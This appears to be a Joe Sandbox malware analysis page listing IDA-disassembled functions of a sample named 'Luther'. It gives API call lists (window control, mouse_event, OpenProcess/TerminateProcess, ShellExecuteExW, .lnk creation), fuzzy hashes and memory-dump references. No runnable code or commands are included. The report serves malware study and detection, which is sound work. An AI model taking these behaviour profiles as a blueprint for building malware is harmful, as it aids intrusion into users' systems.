Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: ef8321e4e14a15dc6798dcee26dc58fc9f8b00f27ef07910e52304a1f500617b
Instruction ID: 1d975cdf54e305cf413e35f0c09b29647ca101af006cc823b6069586286c34fe
Opcode Fuzzy Hash: ef8321e4e14a15dc6798dcee26dc58fc9f8b00f27ef07910e52304a1f500617b
Instruction Fuzzy Hash: 91418A71901204AFDF049F54DD85AAAB7B8FF08304F1484B5FD00AE2A6D731EE55DBA0

Function 00EC8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E8FBEF,00000000,?,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00EC8CA7
EnableWindow.USER32(?,00000000), ref: 00EC8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EC8D2C
ShowWindow.USER32(?,00000004), ref: 00EC8D40
EnableWindow.USER32(?,00000001), ref: 00EC8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EC8D8A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: a262fff79b64f2d488c96b6d4b700bd8395adc342ec00ef7fe1a68db218e65cd
Instruction ID: a573c35201676012e09ec9a6851fab18ea86d70ecc398435187cf621b933006e
Opcode Fuzzy Hash: a262fff79b64f2d488c96b6d4b700bd8395adc342ec00ef7fe1a68db218e65cd
Instruction Fuzzy Hash: 4441C630601248AFDB25CF24DB99FA57BF0FB45308F14106DE5096B1A2CB335847DB61

Function 00EB2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00EB2D45

Part of subcall function 00EAEF33: GetWindowRect.USER32(?,?), ref: 00EAEF4B

GetDesktopWindow.USER32 ref: 00EB2D6F
GetWindowRect.USER32(00000000), ref: 00EB2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EB2DB2
GetCursorPos.USER32(?), ref: 00EB2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EB2E3C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 6f153b9f5dc34209f52966f5645d8096816387d719c62da88b0e75d623cf0a6f
Instruction ID: 6e38444f3c6e579b89e84c5c0dc625d6d187f3f74d589603345894f4c17f346b
Opcode Fuzzy Hash: 6f153b9f5dc34209f52966f5645d8096816387d719c62da88b0e75d623cf0a6f
Instruction Fuzzy Hash: 2D31EF72509315AFC720DF148C45F9BB7A9FF88358F00092EF989A7181DB31E909CB92

Function 00E955E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00E955F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E95616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E9564E
_wcslen.LIBCMT ref: 00E9566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E95674
_wcsstr.LIBVCRUNTIME ref: 00E9567E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 7f5a52fdb18b4e0fc25bdba717a7364851d5d4686154463d786abc279bcc76e8
Instruction ID: 6b25fb6d70cecfc146b6bdb3565216648128daa91abc4acb27eece9a5d31c054
Opcode Fuzzy Hash: 7f5a52fdb18b4e0fc25bdba717a7364851d5d4686154463d786abc279bcc76e8
Instruction Fuzzy Hash: 5B210473204600BBEF165B259C49E7B7BA8DF45710F14503AFC05EA092EA62DC418760

Function 00EA6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871

_wcslen.LIBCMT ref: 00EA62C0
CoInitialize.OLE32(00000000), ref: 00EA63DA
CoCreateInstance.OLE32(00ED0CC4,00000000,00000001,00ED0B34,?), ref: 00EA63F3
CoUninitialize.OLE32 ref: 00EA6411

Strings

.lnk, xrefs: 00EA62BB, 00EA6306, 00EA63CA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: b22f301b0e32614b851e605d930b3f3537f11866c239d82395a3603bfc2ba7c2
Instruction ID: 266ed61c7bfa36b621873be6d7f8072d074ac14cb2e0febf41a3f693060d8be1
Opcode Fuzzy Hash: b22f301b0e32614b851e605d930b3f3537f11866c239d82395a3603bfc2ba7c2
Instruction Fuzzy Hash: 0CD11475A043019FCB14DF15C584A2ABBF5FF8A714F189859F885AB361CB31EC49CB92

Function 00EC86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00EC8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EC8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EC877D
GetSystemMetrics.USER32(00000004), ref: 00EC87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EAC1F2,00000000), ref: 00EC87C6

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

GetSystemMetrics.USER32(00000004), ref: 00EC87B1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: a14b9e7b2e3b6a394cc984e1323c25f9cdb6e3c461c4669242b34afa08ee25b6
Instruction ID: c0a58bbb3c551c07e19472c2a023e5ae6dd64a127a6183c87331a55474803b6c
Opcode Fuzzy Hash: a14b9e7b2e3b6a394cc984e1323c25f9cdb6e3c461c4669242b34afa08ee25b6
Instruction Fuzzy Hash: 232181716142459FCB145F39CF08F6A37A5FB45329F25563EF926E21E0EA328852DB10

Function 00E536F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E536E9,00E53355), ref: 00E53700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E5370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E53727
SetLastError.KERNEL32(00000000,?,00E536E9,00E53355), ref: 00E53779

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8879c9cb419dc9e12fd25ea25e3843c28381b1bbce2cd0fe11b99fe35e5158b6
Instruction ID: 2125832980839f73866a680b9ace827f89eb8bb63f7da79462588fa2fe313a4f
Opcode Fuzzy Hash: 8879c9cb419dc9e12fd25ea25e3843c28381b1bbce2cd0fe11b99fe35e5158b6
Instruction Fuzzy Hash: C90149B290D7112EE62416756C8156B2AD5D7487F77202A3AF810700E1EE124D0EA144

Function 00E630E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00E54D53,00000000,?,?,00E568E2,?,?,00000000), ref: 00E630EB
_free.LIBCMT ref: 00E6311E
_free.LIBCMT ref: 00E63146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00E63153
SetLastError.KERNEL32(00000000,?,00000000), ref: 00E6315F
_abort.LIBCMT ref: 00E63165

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2e9dc0463ea0e1f294060d126e630ae5afc5f59375e2eb2459da322780a86894
Instruction ID: 865e9975d518755d029e6ab71ecbcfaf372c9983552ca773d44a9a4090f2a464
Opcode Fuzzy Hash: 2e9dc0463ea0e1f294060d126e630ae5afc5f59375e2eb2459da322780a86894
Instruction Fuzzy Hash: 82F0F2765C69012BC2113739BC0AE5E169A9FD37F5B213538FA24F22D2EF358E075161

Function 00EC9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00E31F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E31F87
Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31F96
Part of subcall function 00E31F2D: BeginPath.GDI32(?), ref: 00E31FAD
Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EC94AA
LineTo.GDI32(?,00000003,00000000), ref: 00EC94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EC94CC
LineTo.GDI32(?,00000000,00000003), ref: 00EC94DC
EndPath.GDI32(?), ref: 00EC94EC
StrokePath.GDI32(?), ref: 00EC94FC

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4dae1949934c04d375481d73195438739676a998bbfc2e4314e1195d42bca13e
Instruction ID: a7f19a33f42cd27fceb4f048ec3019ea4fb9f188ea3ec0965e138f63de1dd2cf
Opcode Fuzzy Hash: 4dae1949934c04d375481d73195438739676a998bbfc2e4314e1195d42bca13e
Instruction Fuzzy Hash: B6111B7600410DBFDF029F95DC89E9A7F6DEF08364F048025BE196A161C7729D56DBA0

Function 00E95B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E95B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E95B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E95B94
ReleaseDC.USER32(00000000,00000000), ref: 00E95B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E95BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E95BC5

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ed14abbdcd4a563d56d3f61d29ab22ece0b47f84b5b3fbfde37e9747df8e38c1
Instruction ID: e3337102bd7eb12394eda2a91029711d23ef89899737e25aab032535253be35e
Opcode Fuzzy Hash: ed14abbdcd4a563d56d3f61d29ab22ece0b47f84b5b3fbfde37e9747df8e38c1
Instruction Fuzzy Hash: 8B012CB5A04718BFEF119BAA9C49F4EBFA8EB48751F044075EA09B7280D6719805CFA0

Function 00E3327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E332AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00E332B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E332C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E332CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00E332D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E332DD

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: f86342649d491d352f990c1ac8df5254de802af28f82445e0b127bcacbdc377d
Instruction ID: 2c50d8f889a56de5b353770f004b0eba5079f934188a85e424ca8eec55c69315
Opcode Fuzzy Hash: f86342649d491d352f990c1ac8df5254de802af28f82445e0b127bcacbdc377d
Instruction Fuzzy Hash: BD016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 00E9F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E9F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E9F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00E9F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9F48C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 27771f6e354f0b1388f73446f027906429fdc846b8d222386c85056e7b0be128
Instruction ID: ec0f3cd6f5948f354ced94b5d0eedc77a3446df46a86b995cdaae601bc71884e
Opcode Fuzzy Hash: 27771f6e354f0b1388f73446f027906429fdc846b8d222386c85056e7b0be128
Instruction Fuzzy Hash: E1F06772205158BFE7205B639C0EEEF7A7CEBC6B11F000038F601E1090A6A22A06C6B5

Function 00E734D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00E734EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00E73506
GetWindowDC.USER32(?), ref: 00E73512
GetPixel.GDI32(00000000,?,?), ref: 00E73521
ReleaseDC.USER32(?,00000000), ref: 00E73533
GetSysColor.USER32(00000005), ref: 00E7354D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: d570ab063a46b1fb1e3052bcbc51ecc877ae963476e1444afe054d7daa776606
Instruction ID: 38b85a8f1e20e552ff716c8a1a25358bda1ac3ebbf6564be33e593eeb703e3f5
Opcode Fuzzy Hash: d570ab063a46b1fb1e3052bcbc51ecc877ae963476e1444afe054d7daa776606
Instruction Fuzzy Hash: 66012431504205EFDB915BA5DC08FEABBB2FB08321F504174FA1AB21A0CB331E56EB10

Function 00E921C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E921CC
UnloadUserProfile.USERENV(?,?), ref: 00E921D8
CloseHandle.KERNEL32(?), ref: 00E921E1
CloseHandle.KERNEL32(?), ref: 00E921E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00E921F2
HeapFree.KERNEL32(00000000), ref: 00E921F9

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 3bbde99bf674452541edb19448dffcf79205831c05e6749dc6eb25b76f89b114
Instruction ID: 346653c7f8d5b9b5a7ed3f36145a0284ef7e48a3abb7fd48c75b5a970064fb82
Opcode Fuzzy Hash: 3bbde99bf674452541edb19448dffcf79205831c05e6749dc6eb25b76f89b114
Instruction Fuzzy Hash: 3AE0C2B6008505BFDB011BA6EC0CD0ABF29FB49322B144235F225E2070CB339426DB50

Function 00E9CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9CF99
_wcslen.LIBCMT ref: 00E9CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E9D075

Strings

0, xrefs: 00E9CF5A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: b23dc734ba0f4174018a5c48be943eef9730ecf2caa2ffb194c9f8bf704d1ee9
Instruction ID: 0015e405c4c22bcecd8947f31eb5f1251e813b0aecbd17f21dc322a2bdc0f5e9
Opcode Fuzzy Hash: b23dc734ba0f4174018a5c48be943eef9730ecf2caa2ffb194c9f8bf704d1ee9
Instruction Fuzzy Hash: 80510171608310ABDB10AF28CC48BABBBE9AF45318F042A2DF991F31D1DB70C905C752

Function 00EBB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00EBB903

Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF

GetProcessId.KERNEL32(00000000), ref: 00EBB998
CloseHandle.KERNEL32(00000000), ref: 00EBB9C7

Strings

@, xrefs: 00EBB8D2
<, xrefs: 00EBB8CB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: ca503d6479eda1e8993e8ca07451453131d70a23fffb93dfea4ba4fb7cb817ae
Instruction ID: 2acdb78c4e59df183ce94b1c522fd55401ec323fb81a80126ffab45741b05cc3
Opcode Fuzzy Hash: ca503d6479eda1e8993e8ca07451453131d70a23fffb93dfea4ba4fb7cb817ae
Instruction Fuzzy Hash: 16715574A00615DFCB14EF55C884A9EBBF4EF08304F0494A9E856BB292CBB5ED45CB90

Function 00EC4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC48D1
IsMenu.USER32(?), ref: 00EC48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC492E
DrawMenuBar.USER32 ref: 00EC4941

Strings

0, xrefs: 00EC4825

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
